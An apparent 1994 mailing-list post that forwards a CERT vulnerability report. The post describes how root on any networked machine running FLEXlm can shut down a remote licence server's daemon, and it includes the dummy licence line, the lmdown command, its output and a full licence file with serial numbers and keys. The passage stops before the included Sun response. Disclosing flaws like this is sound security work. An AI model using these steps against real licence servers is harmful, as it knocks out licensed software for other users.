From: rjd4 () ucs cam ac uk (Bob Dowling)
Date: Thu, 24 Feb 1994 21:01:08 +0000

I'm new to this mailing list, so if the format of this report is
incorrect or inappropriate, please don't flame me too much.

This is a copy of a report I sent to the CERT some time ago about
Highland's FLEXlm software. I've just been told that what I describe
here as a denial of service *attack* is causing serious problems in one
of our departments simply through *accident*.

I've removed the Sun engineer's name from the included message in case
anyone decides to blame the messenger.

----- Included: Message to the CERT -----

The following is a description of what I believe to be a serious
vulnerability in the widely used FLEXlm network licensing package
written by Highland Software. You probably know about it already, but
just in case you don't, here goes...

The root user on an arbitrary network-connected machine with the FLEXlm
software can cause the FLEXlm licence manager daemon on any
network-accessible licence server to shut down using the FLEXlm lmdown
command.

Two machines: alpha and beta. Alpha is running the FLEXlm licence
server software. Alpha does not "trust" beta in any way. Beta has a
copy of the FLEXlm software too, and in particular has the lmdown
program. On beta a one line dummy licence data file is created in
/etc/licence.dat pointing at alpha:

    SERVER alpha 7260057c 1700

(The hostid "7260057c" is not alpha's; it is deliberately incorrect.)

alpha's licence data file is

    SERVER alpha 7260057b 1700
    DAEMON suntechd /opt/SUNWspro/bin
    # Serial No FX2811-162-13
    # 1 user license for SPARCompiler_C 2.0FCS, Expires: Never
    FEATURE sunpro.c suntechd 2.000 1-jan-0 1 EBA8B0F1534F569284CD ""
    # Serial No FX6696-16201-10
    # 1 user license for SPARCompiler_Fortran 2.01FCS, Expires: Never
    FEATURE sunpro.f77 suntechd 2.010 1-jan-0 1 8B7850316C56E1F2467B ""
    # Serial No FX3928-16301-4
    # 1 user license for SPARCompiler_C++ 3.01FCS, Expires: Never
    FEATURE sunpro.cc suntechd 3.010 1-jan-0 1 BBA86001599F95AC7CE7 ""
    # Serial No FX11-4036301-7 - using FX6-4026301-7 FX1667-16301-7
    # 3 user license for SPARCompiler_Pascal 3.01FCS, Expires: Never
    FEATURE sunpro.pc suntechd 3.010 1-jan-0 3 8BD84051269969C54B14 ""
    # Serial No FX128-162-1
    # 1 user license for SPARCworks 2.0FCS, Expires: Never
    FEATURE sunpro.sparcworks.tools suntechd 2.000 1-jan-0 1 3B38D011304C4D636ADA ""

On beta I give the following instructions as root:

    # lmdown -c /etc/licence.dat
    lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
    Shutting down FLEXlm on nodes: alpha
    Are you sure? [y/n]: y
    Shut down node alpha

and alpha's licence serving is indeed shut down.

*** Action so far:

I reported this as a bug to Sun, who supplied us with the FLEXlm
software as part of their compiler kit. (Though I don't regard it as a
Sun-specific problem; I think this is a function purely of the FLEXlm
software.) I enclose their response:

----- Included message: -----